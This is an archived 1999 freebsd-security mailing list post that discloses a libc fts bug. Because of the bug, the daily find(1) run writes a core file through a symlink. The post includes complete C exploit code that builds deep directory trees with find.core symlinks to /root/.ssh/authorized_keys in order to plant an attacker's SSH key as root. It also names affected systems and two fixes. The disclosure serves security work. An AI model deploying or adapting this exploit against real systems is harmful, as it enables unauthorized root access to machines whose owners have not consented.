Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST) From: Przemyslaw Frasunek <venglin@FreeBSD.lublin.pl> To: Rafal Banaszkiewicz <raf@tb-303.org> Cc: freebsd-security@freebsd.org Subject: RE: fts_print() , find and other stuff ? Message-ID: <XFMail.990825091318.venglin@FreeBSD.lublin.pl> In-Reply-To: <Pine.BSF.3.95q.990825001835.16140A-100000@yucca.daewoo.lublin.pl>
next in thread | previous in thread | raw e-mail | index | archive | help
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On 24-Aug-99 Rafal Banaszkiewicz wrote:
> One of my friends has written sploit code for this bug ? It's old
> bug ... and it's still not fixed .
Yes, this bug is quite easy to exploit. Find(1) runs every day from
/etc/security script. It segfaults, when directory tree is _very_ long, because
of junk pointer to directory name.
Core is created in one of directories from our tree. But if find.core already
exists, it's overwritten. It's possible to create symlink from eg.
master.passwd or something else to find.core, and this file will be
overwritten.
Sample code below.
BTW. Sorry for my poor English.
/*
(c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>
bug in fts libc functions allows to overwrite any file in system, when
running /etc/security script (executed from 'daily' scripts).
affected systems:
- freebsd (all versions)
- probably openbsd/netbsd
fix:
- limit root's coredump size
- patch libc
*/
#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <unistd.h>
#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE "/root/.ssh/authorized_keys"
#define CORE "find.core"
#define DEPTH 300
#define BUFSIZE 250
int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{
if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
return -1;
if (chdir(dir))
return -1;
if (symlink(linkfrom, linkto) < 0)
return -1;
return 0;
}
int main(void)
{
int i = 0;
char pid[10], buf[BUFSIZE];
sprintf(pid, "%d", getpid());
if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
{
perror("mkdir()");
return -1;
}
if (chdir(pid))
{
perror("chdir()");
return -1;
}
bzero(buf, BUFSIZE);
memset(buf, 0x41, BUFSIZE-1);
for(i=0;i<DEPTH;i++)
{
if (makedir(STRING, FILE, CORE) < 0)
{
perror("makedir()");
return -1;
}
if(makedir(buf, FILE, CORE) < 0)
{
perror("makedir()");
return -1;
}
}
return 0;
}
- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv
iQA/AwUBN8OXjf6SPyHAYTvjEQJ+lACcCWAsD7aIv+PNIUiCZHx7CBVbDrQAnR9J
JK6j0fxD4ht9nmHTtYZTLPBe
=frln
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?XFMail.990825091318.venglin>